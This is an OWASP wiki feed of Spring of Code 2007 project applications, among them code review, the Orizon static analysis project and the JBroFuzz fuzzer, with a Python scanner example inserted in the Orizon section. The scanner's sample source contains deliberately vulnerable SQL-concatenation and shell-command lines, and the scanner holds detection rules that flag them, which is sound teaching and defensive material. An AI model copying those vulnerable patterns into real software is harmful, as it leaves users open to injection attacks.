&lt;br /&gt;
Enigform is the reference implementation of the Internet Draft I'm working on, in discussion with members of the IETF's OpenPGP Working Group.&lt;br /&gt;
&lt;br /&gt;
Some simple PHP code is enough to make a web application Enigform-aware [http://enigformtest.buanzo.com.ar]. The Smutty PHP MVC Framework already supports Enigform [http://smutty.pu-gh.com/demo/enigform].&lt;br /&gt;
&lt;br /&gt;
=== Long Term ===&lt;br /&gt;
&lt;br /&gt;
Have the Draft be proposed as a Standards Track RFC document, have Enigform support directly in Apache and IIS, and port Enigform to other browsers&lt;br /&gt;
and/or programming languages, and also provide OpenPGP De/Encryption support.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Why should I be selected ===&lt;br /&gt;
&lt;br /&gt;
I have the experience, security awareness and means to make this project THE web security project of the decade. I am a respected member of the&lt;br /&gt;
international security community, and I firmly believe Enigform is my greatest idea so far.&lt;br /&gt;
&lt;br /&gt;
== Eoin Keary - Code review Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
I am proposing that I complete the OWASP Code review guide during this period.&lt;br /&gt;
The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners. &lt;br /&gt;
&lt;br /&gt;
I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.&lt;br /&gt;
&lt;br /&gt;
There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.&lt;br /&gt;
Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as Webservices.&lt;br /&gt;
 &lt;br /&gt;
The Code review process and procedure needs also to be covered. A guide to establishing a mature code review process also needs to be done.&lt;br /&gt;
Code review methodologies also need to be discussed.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
&lt;br /&gt;
Update of the code review guide:&lt;br /&gt;
* Add additional areas relating to the code review process such as:&lt;br /&gt;
** Benefits and pitfalls&lt;br /&gt;
** Methodology&lt;br /&gt;
** The code review process&lt;br /&gt;
*** Transactional analysis&lt;br /&gt;
*** Managing the code review process&lt;br /&gt;
*** Assigning risk to findings&lt;br /&gt;
&lt;br /&gt;
** Technical guides&lt;br /&gt;
*** Language specific best practice &lt;br /&gt;
*** Java &lt;br /&gt;
*** .NET &lt;br /&gt;
*** PHP &lt;br /&gt;
*** MySQL &lt;br /&gt;
*** Stored Procs &lt;br /&gt;
*** C/C++ &lt;br /&gt;
&lt;br /&gt;
** Code review by vulnerability:&lt;br /&gt;
*** Reviewing Code for Buffer Overruns and Overflows &lt;br /&gt;
*** Reviewing Code for OS Injection&lt;br /&gt;
*** Reviewing Code for SQL Injection&lt;br /&gt;
*** Reviewing Code for Data Validation&lt;br /&gt;
*** Reviewing code for XSS issues&lt;br /&gt;
*** Reviewing Code for Error Handling&lt;br /&gt;
*** Reviewing Code for Logging Issues&lt;br /&gt;
*** Reviewing The Secure Code Environment&lt;br /&gt;
*** Reviewing code for Authorization Issues&lt;br /&gt;
*** Reviewing code for Authentication Issues&lt;br /&gt;
*** Reviewing code for Session Integrity&lt;br /&gt;
*** Reviewing code for Cross Site Request Forgery&lt;br /&gt;
*** Reviewing code for Cryptography implementation issues&lt;br /&gt;
*** Reviewing code for Dangerous HTTP Methods (Deployment)&lt;br /&gt;
*** Race Conditions &lt;br /&gt;
&lt;br /&gt;
The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
&lt;br /&gt;
I used to head up the code review team as part of the application security group in Fidelity Investments and have 5+ years of experience in the secure code review process. &lt;br /&gt;
I also was the lead of the Testing guide until V2 was published via the Autumn of Code. &lt;br /&gt;
&lt;br /&gt;
I have always  delivered any work I have volunteered for on time. &lt;br /&gt;
 &lt;br /&gt;
I have been involved in OWASP projects for 2/3 years now and have always been an active contributor.&lt;br /&gt;
&lt;br /&gt;
== Paolo Perego - Owasp Orizon Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
The Owasp Orizon Project [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] was born in 2006 as an answer to the lack of a common engine and library usable by open source code review related tools.&lt;br /&gt;
&lt;br /&gt;
I'm proposing that, during the Spring of Code 2007 period, I'll complete the static analysis API and the Java source code enforcement objects.&lt;br /&gt;
&lt;br /&gt;
Sometimes a complete code review approach is not suitable for most customers who want to harden code which is approaching the release stage. For such a reason, I started writing Java objects that embed most of the security checks against common web vulnerabilities (XSS, SQL injection, Session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.&lt;br /&gt;
&lt;br /&gt;
I do believe that a common set of API and a common safe coding best practices library is one of the most important goals to bring application security to the developers.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
Completing the static code review API section&lt;br /&gt;
* improving programming language to XML translator&lt;br /&gt;
* improving security best practices code review scan library&lt;br /&gt;
* improving secure coding fashion best practices library&lt;br /&gt;
* writing the pattern matching scan using the aforementioned libraries&lt;br /&gt;
Writing the Java source code enforcement objects&lt;br /&gt;
* writing an object to handle form data values to avoid XSS&lt;br /&gt;
* writing an object to handle form data values to avoid SQL Injection&lt;br /&gt;
* writing an object to handle HttpRequest and HttpSession objects&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
Owasp Orizon is the first Owasp project I'm involved in. I'm also a contributor to the Owasp Italian chapter managed by Matteo Meucci and I'm speaking at various events about application security and safe coding best practices.&lt;br /&gt;
&lt;br /&gt;
I'm a security consultant working in ethical hacking and we're approaching code review and safe topics right now.&lt;br /&gt;
I'm a developer too, so I also understand the &amp;quot;dark side&amp;quot; of the problem: developing code with security in mind.&lt;br /&gt;
&lt;br /&gt;
I work using the &amp;quot;release early, release often&amp;quot; paradigm so as to be concrete and let other people have something usable to work with.&lt;br /&gt;
&lt;br /&gt;
== Sebastien Deleersnyder - OWASP Education Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
This Education project aims to provide building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences. &lt;br /&gt;
&lt;br /&gt;
Web Application Security Education and Awareness is needed throughout the entire organization, each area and level of organizations have specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience. &lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
Currently the project goals are to create Educational Tracks: &lt;br /&gt;
* Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past&lt;br /&gt;
* A &amp;quot;Web Application Security Primer&amp;quot; Track for beginners (4 hours) &lt;br /&gt;
* A &amp;quot;What developers should know on Web Application Security&amp;quot; Track for developers (4 hours) &lt;br /&gt;
&lt;br /&gt;
* '''Why you should be sponsored for the project''': &lt;br /&gt;
I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.&lt;br /&gt;
&lt;br /&gt;
This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my belief that awareness is an important cornerstone of building secure web applications, and this project will actively support that.&lt;br /&gt;
&lt;br /&gt;
If we are granted Spoc 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.&lt;br /&gt;
&lt;br /&gt;
* '''More details''': &lt;br /&gt;
The detailed [[OWASP Education Project Roadmap|road map]] can be found here.&lt;br /&gt;
The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.&lt;br /&gt;
&lt;br /&gt;
== Subere - OWASP JBroFuzz Project ==&lt;br /&gt;
&lt;br /&gt;
==== Overview ==== &lt;br /&gt;
&lt;br /&gt;
JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.&lt;br /&gt;
&lt;br /&gt;
==== Fuzzing ==== &lt;br /&gt;
&lt;br /&gt;
As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.&lt;br /&gt;
&lt;br /&gt;
==== Objectives ==== &lt;br /&gt;
&lt;br /&gt;
JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addition of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):&lt;br /&gt;
&lt;br /&gt;
* '''Open Source Tab'''&lt;br /&gt;
* '''NTLM Brute Force over HTTP/S Tab'''&lt;br /&gt;
* '''Pure HTTP/S Fuzzing using HTTPClient'''&lt;br /&gt;
* '''Blind SQL Injection Fuzzing Tab'''&lt;br /&gt;
&lt;br /&gt;
At the same time, the following existing tabs need to be updated and made more robust (details in next section):&lt;br /&gt;
&lt;br /&gt;
* '''TCP Fuzzing tab allowing graph outputs'''&lt;br /&gt;
* '''TCP Sniffing tab update thread Agent Queue'''&lt;br /&gt;
* '''Update Generators file format'''&lt;br /&gt;
* '''Include SOAP and XML fuzzing'''&lt;br /&gt;
&lt;br /&gt;
This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.&lt;br /&gt;
&lt;br /&gt;
==== Deliverables ==== &lt;br /&gt;
&lt;br /&gt;
Based on the above, the new code elements that will be added are as follows:&lt;br /&gt;
&lt;br /&gt;
* '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''&lt;br /&gt;
* '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute over HTTP/S NTLM.''&lt;br /&gt;
* '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''&lt;br /&gt;
* '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''&lt;br /&gt;
&lt;br /&gt;
For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail: &lt;br /&gt;
&lt;br /&gt;
* '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''&lt;br /&gt;
* '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''&lt;br /&gt;
* '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''&lt;br /&gt;
* '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''&lt;br /&gt;
&lt;br /&gt;
Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.&lt;br /&gt;
&lt;br /&gt;
==== Background ==== &lt;br /&gt;
&lt;br /&gt;
In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of appr. 5000 downloads in the last months. &lt;br /&gt;
&lt;br /&gt;
Coming from a strong Java background (5+ years) I decided to implement and release JBroFuzz in order to initially simplify penetration testing processes that relate to web application and network protocol fuzzing.&lt;br /&gt;
&lt;br /&gt;
I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.&lt;br /&gt;
&lt;br /&gt;
==== Why should JBroFuzz be sponsored? ==== &lt;br /&gt;
&lt;br /&gt;
Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area of focus that should not be dismissed in building secure software applications.&lt;br /&gt;
&lt;br /&gt;
Keeping the code platform independent adds a huge advantage. &lt;br /&gt;
&lt;br /&gt;
Receiving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality that they have assisted in implementing.&lt;br /&gt;
&lt;br /&gt;
== Joshua Perrymon - OWASP LiveCD Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
I am proposing that I complete the second version of the OWASP LiveCD during this period.&lt;br /&gt;
The first version of the LiveCD is now available and includes many of the current OWASP documents and tools. I believe the LiveCD is one of the best mediums to promote OWASP tools and documentation. It is portable and already being used by thousands of security professionals to perform application testing and training. &lt;br /&gt;
&lt;br /&gt;
In the current state the CD is stable and contains a lot of tools. However, this is just the beginning. There is a LOT of work that needs to be completed. The entire CD experience needs to be branded using OWASP graphics. This should start with the boot screen and carry all the way through to the icons and desktop graphics. The CD should also include the wiki and ALL the tools developed for OWASP.&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
&lt;br /&gt;
Update of the LiveCD:&lt;br /&gt;
* Complete OWASP branding&lt;br /&gt;
* Add OWASP wiki&lt;br /&gt;
* Add encryption capabilities&lt;br /&gt;
* Add more OWASP tools&lt;br /&gt;
* Add more pen-test tools such as: VoIP, RFID, Bluetooth, wireless, etc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
&lt;br /&gt;
I had the idea of the LiveCD about a year ago and have worked very hard to get the first version developed. This was driven by my vision to make all of the OWASP tools available on a portable medium. The main difference in the OWASP LiveCD vs. other live CDs is going to be the regularity of updates. If sponsorship can be obtained the CD could be updated on a monthly basis, not once a year like other live CDs. The CD will also include specialty tools and documentation to perform VoIP, RFID, Bluetooth, and wireless security assessments.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Mark Curphey – A Better Web Security Evaluation Criteria ==&lt;br /&gt;
&lt;br /&gt;
'''Problem''' &lt;br /&gt;
PCI DSS is attracting a lot of criticism for a lot of valid reasons. &lt;br /&gt;
 &lt;br /&gt;
http://securitybuddha.com/2007/03/23/the-problems-with-the-pci-data-security-standard-part-1/&lt;br /&gt;
&lt;br /&gt;
http://blogs.csoonline.com/node/210&lt;br /&gt;
&lt;br /&gt;
http://www.computerweekly.com/blogs/stuart_king/2007/03/more-on-pci---the-audit-guide.html&lt;br /&gt;
&lt;br /&gt;
The list is of course long and not appropriate here...&lt;br /&gt;
&lt;br /&gt;
'''Solution and Deliverables'''&lt;br /&gt;
As opposed to continuing to say what’s wrong with PCI DSS, it seems to me that OWASP is a perfect forum to create and publish a “better criteria”. This can either be adopted and implemented by an organization like OWASP or considered to be incorporated into the PCI or other security standards. This project would address the following:&lt;br /&gt;
&lt;br /&gt;
'''Standard''' &lt;br /&gt;
*The technical things people should care about&lt;br /&gt;
*The operational  / management things people should care about&lt;br /&gt;
'''Business Model''' &lt;br /&gt;
*A complete framework for certification (ongoing) and implementation (including certifying auditors, ongoing validation etc)&lt;br /&gt;
&lt;br /&gt;
Note:  This is no trivial task to get right. I would need to ensure I can commit to completing the work to a good quality. I think this will take at least 2 months from start to finish to complete, but I think it is very important for the industry and potentially for OWASP.  I wanted to gauge the interest by first posting this.&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&amp;diff=17412</id>
		<title>OWASP Spring Of Code 2007 Applications</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&amp;diff=17412"/>
				<updated>2007-03-26T10:12:14Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]&lt;br /&gt;
&lt;br /&gt;
'''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''&lt;br /&gt;
&lt;br /&gt;
See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what to do once you have completed your Application&lt;br /&gt;
&lt;br /&gt;
---------&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:&lt;br /&gt;
&lt;br /&gt;
== {Your first name or Alias} - {Project name} ==&lt;br /&gt;
Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].&lt;br /&gt;
&lt;br /&gt;
You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic.  We strongly suggest that you include the following information in your proposal.&lt;br /&gt;
&lt;br /&gt;
* Your educational and professional background&lt;br /&gt;
&lt;br /&gt;
* Application security experience and accomplishments&lt;br /&gt;
&lt;br /&gt;
* Participation and leadership in open communities&lt;br /&gt;
&lt;br /&gt;
* The opportunity, challenges, issues or need your proposal addresses&lt;br /&gt;
&lt;br /&gt;
* Objectives or ways in which you will meet the goal(s)&lt;br /&gt;
&lt;br /&gt;
* Specific activities and who will carry out these activities&lt;br /&gt;
&lt;br /&gt;
* Specific deliverables and a rough project schedule so we can track progress&lt;br /&gt;
&lt;br /&gt;
* Long-term vision for the project&lt;br /&gt;
&lt;br /&gt;
* Any other reasons why you and your project should be selected&lt;br /&gt;
&lt;br /&gt;
== Buanzo - Enigform: Firefox Addon for OpenPGP signing of HTTP requests ==&lt;br /&gt;
&lt;br /&gt;
I am a 25-year-old independent security consultant from Buenos Aires, Argentina, who has contributed to the world of&lt;br /&gt;
information systems security since 1994, when BBSes and Linux still lived together.&lt;br /&gt;
&lt;br /&gt;
A quick search for buanzo on Google [http://www.google.com/search?hl=en&amp;amp;q=buanzo&amp;amp;btnG=Google+Search] will provide all necessary details about my professional and community background. For verifiable experience, you could also check my Rent a Coder profile [http://www.rentacoder.com/RentACoder/SoftwareCoders/showBioInfo.asp?lngAuthorId=735204].&lt;br /&gt;
&lt;br /&gt;
In my free time I like playing with my Punk-Pop band [http://www.purevolume.com/futurabandapunkpop], Futurabanda. [http://www.futurabanda.com.ar], and maintaining my Restaurants, Wines and Recipes site. [http://www.vivamoslavida.com.ar]. I have to admit that my first priorities are my beloved son [http://www.fotolog.com/buanzo] and my wonderful wife [http://www.fotolog.com/buanzo].&lt;br /&gt;
&lt;br /&gt;
=== Accomplishments ===&lt;br /&gt;
&lt;br /&gt;
I've contributed scripts, fixes and translations to the Nmap project. I've also acted as Expert Contributor for SANS TOP-20 2004, 2005 and 2006. I've developed &lt;br /&gt;
tools that can be found in Freshmeat, like mprl (a getty enhancement to allow remote logins from the login: prompt of the console). I've also written&lt;br /&gt;
the Unix chapter of the OISSG's Information Systems Security Assessment Framework, v0.1 [http://www.oissg.org/content/view/71/71/]. I'm currently writing&lt;br /&gt;
an Internet Draft to be proposed for RFC regarding Enigform.&lt;br /&gt;
&lt;br /&gt;
=== Community ===&lt;br /&gt;
&lt;br /&gt;
I run the official 2600 meetings site for Argentina [http://www.2600.com/meetings/pages.html], and I was proposed, but declined, for President of the Argentinian Free Software group called SOLAR [www.solar.org.ar]. I have been an active member of the FLOSS community since 1996, having written articles in magazines http://www.net-security.org/dl/articles/Detecting_and_Understanding_rootkits.txt, made TV, radio&lt;br /&gt;
and newspaper appearances [http://codigoabierto.bitacoras.com/archivos/2005/04/01/buanzo-hacks] and led different security research groups in Spain, Mexico and Argentina. Currently I contribute time through my sites, forums and blogs,&lt;br /&gt;
answering questions in mailing lists and helping coordinate some local LUGs. I also manage the Linux Counter for Argentina [http://counter.li.org/reports/place.php?place=AR].&lt;br /&gt;
&lt;br /&gt;
=== My Project ===&lt;br /&gt;
&lt;br /&gt;
Enigform [http://enigform.mozdev.org] is a Firefox extension that enhances HTTP with OpenPGP functionality. It digitally signs outgoing HTTP requests so that a web server can authenticate the identity and data of the incoming request. It is a Web Security tool because it can, if correctly implemented as any OpenPGP based technology, render man in the middle attacks useless. I think OpenPGP already speaks for itself regarding e-mail. Imagine the same benefits for HTTP and web applications. I think Enigform can fit into the OWASP Validation Project [http://www.owasp.org/index.php/Category:OWASP_Validation_Project].&lt;br /&gt;
&lt;br /&gt;
Enigform is the reference implementation of the Internet Draft I'm working on, in discussion with members of the IETF's OpenPGP Working Group.&lt;br /&gt;
&lt;br /&gt;
Some simple PHP code is enough to make a web application Enigform-aware [http://enigformtest.buanzo.com.ar]. The Smutty PHP MVC Framework already supports Enigform [http://smutty.pu-gh.com/demo/enigform].&lt;br /&gt;
&lt;br /&gt;
=== Long Term ===&lt;br /&gt;
&lt;br /&gt;
Have the Draft be proposed as a Standards Track RFC document, have Enigform support directly in Apache and IIS, and port Enigform to other browsers&lt;br /&gt;
and/or programming languages, and also provide OpenPGP De/Encryption support.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Why should I be selected ===&lt;br /&gt;
&lt;br /&gt;
I have the experience, security awareness and means to make this project THE web security project of the decade. I am a respected member of the&lt;br /&gt;
international security community, and I firmly believe Enigform is my greatest idea so far.&lt;br /&gt;
&lt;br /&gt;
== Eoin Keary - Code review Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
I am proposing that I complete the OWASP Code review guide during this period.&lt;br /&gt;
The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners. &lt;br /&gt;
&lt;br /&gt;
I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.&lt;br /&gt;
&lt;br /&gt;
There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.&lt;br /&gt;
Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as web services.&lt;br /&gt;
 &lt;br /&gt;
The code review process and procedure also need to be covered. A guide to establishing a mature code review process also needs to be done.&lt;br /&gt;
Code review methodologies also need to be discussed.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
&lt;br /&gt;
Update of the code review guide:&lt;br /&gt;
* Add additional areas relating to the code review process such as:&lt;br /&gt;
** Benefits and pitfalls&lt;br /&gt;
** Methodology&lt;br /&gt;
** The code review process&lt;br /&gt;
*** Transactional analysis&lt;br /&gt;
*** Managing the code review process&lt;br /&gt;
*** Assigning risk to findings&lt;br /&gt;
&lt;br /&gt;
** Technical guides&lt;br /&gt;
*** Language specific best practice &lt;br /&gt;
*** Java &lt;br /&gt;
*** .NET &lt;br /&gt;
*** PHP &lt;br /&gt;
*** MySQL &lt;br /&gt;
*** Stored Procs &lt;br /&gt;
*** C/C++ &lt;br /&gt;
&lt;br /&gt;
** Code review by vulnerability:&lt;br /&gt;
*** Reviewing Code for Buffer Overruns and Overflows &lt;br /&gt;
*** Reviewing Code for OS Injection&lt;br /&gt;
*** Reviewing Code for SQL Injection&lt;br /&gt;
*** Reviewing Code for Data Validation&lt;br /&gt;
*** Reviewing code for XSS issues&lt;br /&gt;
*** Reviewing Code for Error Handling&lt;br /&gt;
*** Reviewing Code for Logging Issues&lt;br /&gt;
*** Reviewing The Secure Code Environment&lt;br /&gt;
*** Reviewing code for Authorization Issues&lt;br /&gt;
*** Reviewing code for Authentication Issues&lt;br /&gt;
*** Reviewing code for Session Integrity&lt;br /&gt;
*** Reviewing code for Cross Site Request Forgery&lt;br /&gt;
*** Reviewing code for Cryptography implementation issues&lt;br /&gt;
*** Reviewing code Dangerous HTTP Methods (Deployment)&lt;br /&gt;
*** Race Conditions &lt;br /&gt;
&lt;br /&gt;
The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
&lt;br /&gt;
I used to head up the code review team as part of the application security group at Fidelity Investments and have 5+ years of experience in the secure code review process. &lt;br /&gt;
I also was the lead of the Testing guide until V2 was published via the Autumn of Code. &lt;br /&gt;
&lt;br /&gt;
I have always delivered any work I have volunteered for on time. &lt;br /&gt;
 &lt;br /&gt;
I have been involved in OWASP projects for 2-3 years now and have always been an active contributor.&lt;br /&gt;
&lt;br /&gt;
== Paolo Perego - Owasp Orizon Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
The Owasp Orizon Project [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] was born in 2006 as an answer to the lack of a common engine and library usable by open source code review related tools.&lt;br /&gt;
&lt;br /&gt;
I'm proposing that, during the Spring of Code 2007 period, I'll complete the static analysis API and the Java source code enforcement objects.&lt;br /&gt;
&lt;br /&gt;
Sometimes a complete code review approach is not suitable for most customers who want to harden code that is approaching the release stage. For such a reason, I started writing Java objects that embed most of the security checks against common web vulnerabilities (XSS, SQL injection, session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.&lt;br /&gt;
&lt;br /&gt;
I do believe that a common set of APIs and a common safe coding best practices library is one of the most important goals to bring application security to developers.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
Completing the static code review API section&lt;br /&gt;
* improving the programming language to XML translator&lt;br /&gt;
* improving the security best practices code review scan library&lt;br /&gt;
* improving the secure coding best practices library&lt;br /&gt;
* writing the pattern matching scan using the aforementioned libraries&lt;br /&gt;
Writing the Java source code enforcement objects&lt;br /&gt;
* writing an object to handle form data values to avoid XSS&lt;br /&gt;
* writing an object to handle form data values to avoid SQL Injection&lt;br /&gt;
* writing an object to handle HttpRequest and HttpSession objects&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
Owasp Orizon is the first Owasp project I'm involved in. I'm also a contributor to the Owasp Italian chapter managed by Matteo Meucci, and I give talks at various events about application security and safe coding best practices.&lt;br /&gt;
&lt;br /&gt;
I'm a security consultant working in ethical hacking, and we're approaching code review and safe coding topics right now.&lt;br /&gt;
I'm a developer too, so I also understand the &amp;quot;dark side&amp;quot; of the problem: developing code with security in mind.&lt;br /&gt;
&lt;br /&gt;
I work using the &amp;quot;release early, release often&amp;quot; paradigm, so as to be concrete and let other people have something usable to work with.&lt;br /&gt;
&lt;br /&gt;
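Both the Code review Project above (each area giving a brief explanation, the anti-pattern to look for and a suggested fix) and the Orizon pattern matching scan describe the same mechanism: recognising a vulnerable coding pattern in source text. The following is an added example for this page, not code from either project: a small AST-based scanner in Python that flags two of the anti-patterns listed in the Code review guide outline, a dynamic SQL string passed to execute() and a dynamic command string passed to a shell, and runs it over a constructed sample file. The sample source, the two rules and the function names are assumptions made for the illustration.&lt;br /&gt;
&lt;br /&gt;
```python
import ast

# Constructed sample source for the scanner to run over (not real project code).
# Lines marked "vulnerable" build SQL or a shell command from a variable; the
# "safe" lines show the suggested fix: parameters, or an argument list without a shell.
SAMPLE = '''
import os, subprocess

def find_user(cur, name):
    cur.execute("SELECT id FROM users WHERE name = '" + name + "'")   # vulnerable
    cur.execute(f"SELECT id FROM users WHERE name = '{name}'")        # vulnerable
    cur.execute("SELECT id FROM users WHERE name = %s" % name)        # vulnerable
    cur.execute("SELECT id FROM users WHERE name = ?", (name,))       # safe

def ping(host):
    os.system("ping -c 1 " + host)                                    # vulnerable
    subprocess.run("ping -c 1 " + host, shell=True)                   # vulnerable
    subprocess.run(["ping", "-c", "1", host])                         # safe
'''


def is_dynamic_string(node):
    """True when the expression assembles a string at run time from other values:
    concatenation, %-formatting, f-strings or str.format(). A plain literal is not dynamic."""
    if isinstance(node, ast.Constant):
        return False
    if isinstance(node, ast.JoinedStr):
        return True
    if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Mod)):
        return True
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute) and node.func.attr == "format":
        return True
    return False


def call_name(node):
    """Dotted name of the callee, e.g. 'os.system' or 'cur.execute' ('' if not simple)."""
    f = node.func
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return f.value.id + "." + f.attr
    if isinstance(f, ast.Name):
        return f.id
    return ""


def scan(source):
    """Return sorted (line, message) findings for the two anti-patterns (hypothetical rule set)."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or not node.args:
            continue
        name = call_name(node)
        first = node.args[0]
        shell = any(kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True
                    for kw in node.keywords)
        if name.endswith(".execute") and is_dynamic_string(first):
            findings.append((node.lineno, "SQL injection: dynamic query string passed to execute()"))
        elif name == "os.system" and is_dynamic_string(first):
            findings.append((node.lineno, "OS injection: dynamic command passed to os.system()"))
        elif name.startswith("subprocess.") and shell and is_dynamic_string(first):
            findings.append((node.lineno, "OS injection: shell=True with a dynamic command string"))
    return sorted(findings)


if __name__ == "__main__":
    for line, msg in scan(SAMPLE):
        print("line", line, msg)
```
&lt;br /&gt;
A scanner of this kind finds the anti-pattern only: the parameterised execute() and the list-form subprocess.run() in the sample pass untouched, which is exactly the suggested fix a reviewer would pair with each finding. It has no data-flow tracking, so a query assembled in one statement and executed in the next is missed; that is the step from line-local pattern matching to a taint-tracking engine.&lt;br /&gt;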
== Sebastien Deleersnyder - OWASP Education Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
This Education project aims to provide building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences. &lt;br /&gt;
&lt;br /&gt;
